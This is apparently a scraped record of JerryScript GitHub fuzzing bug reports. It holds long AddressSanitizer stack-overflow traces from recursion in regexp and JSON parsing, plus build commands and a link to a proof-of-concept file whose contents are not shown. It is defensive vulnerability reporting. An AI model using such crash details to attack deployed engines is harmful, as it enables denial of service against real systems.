#229 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#230 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#231 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#232 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#233 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#234 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#235 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#236 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#237 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#238 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#239 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#240 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#241 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#242 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#243 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#244 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#245 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#246 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#247 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#248 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#249 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#250 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
SUMMARY: AddressSanitizer: stack-overflow /home/keven/Fuzzing/jerry-test/jerry-core/parser/regexp/re-bytecode.c:187 re_decode_u32
==123642==ABORTING | Stack overflow at re_decode_u32 jerry-core/parser/regexp/re-bytecode.c:187 | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4301/comments | 1 | 2020-10-20T06:57:55Z | 2020-10-22T08:41:23Z | https://github.com/jerryscript-project/jerryscript/issues/4301 | 725,266,673 | 4,301 |
[
"jerryscript-project",
"jerryscript"
]
| # Build environment:
Ubuntu 16.04
gcc 5.4.0
jerry version: 6f25d6e
build command: python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
test command: ./xst poc
# Target device:
Desktop Linux
# POC
[jerry-001361.txt](https://github.com/jerryscript-project/jerryscript/files/5406788/jerry-001361.txt)
# Description
Below is the ASAN outputs.
ASAN:SIGSEGV
=================================================================
==3664==ERROR: AddressSanitizer: stack-overflow on address 0xff502fd0 (pc 0x081262ca bp 0xff503058 sp 0xff502fc0 T0)
#0 0x81262c9 in ecma_op_object_get_with_receiver /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-objects.c:795
#1 0x812625c in ecma_op_object_get /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-objects.c:774
#2 0x80c6f9d in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:625
#3 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#4 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#5 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#6 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#7 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#8 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#9 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#10 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#11 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#12 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#13 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#14 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#15 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#16 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#17 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#18 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#19 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#20 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#21 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#22 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#23 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#24 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#25 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#26 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#27 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#28 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#29 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#30 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#31 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#32 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#33 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#34 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#35 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#36 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#37 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#38 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#39 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#40 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#41 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#42 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#43 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#44 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#45 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#46 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#47 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#48 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#49 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#50 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#51 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#52 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#53 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#54 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#55 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#56 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#57 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#58 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#59 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#60 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#61 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#62 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#63 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#64 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#65 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#66 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#67 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#68 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#69 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#70 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#71 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#72 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#73 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#74 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#75 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#76 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#77 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#78 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#79 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#80 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#81 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#82 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#83 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#84 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#85 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#86 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#87 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#88 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#89 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#90 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#91 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#92 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#93 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#94 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#95 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#96 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#97 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#98 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#99 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#100 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#101 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#102 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#103 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#104 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#105 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#106 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#107 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#108 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#109 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#110 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#111 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#112 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#113 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#114 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#115 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#116 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#117 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#118 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#119 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#120 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#121 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#122 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#123 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#124 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#125 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#126 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#127 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#128 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#129 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#130 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#131 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#132 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#133 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#134 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#135 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#136 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#137 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#138 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#139 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#140 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#141 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#142 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#143 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#144 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#145 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#146 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#147 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#148 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#149 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#150 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#151 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#152 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#153 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#154 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#155 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#156 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#157 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#158 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#159 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#160 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#161 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#162 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#163 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#164 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#165 0x80c6d31 in ecma_builtin_json_internalize_process_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:749
#166 0x80c7438 in ecma_builtin_json_internalize_property /home/keven/Fuzzing/jerry-test/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
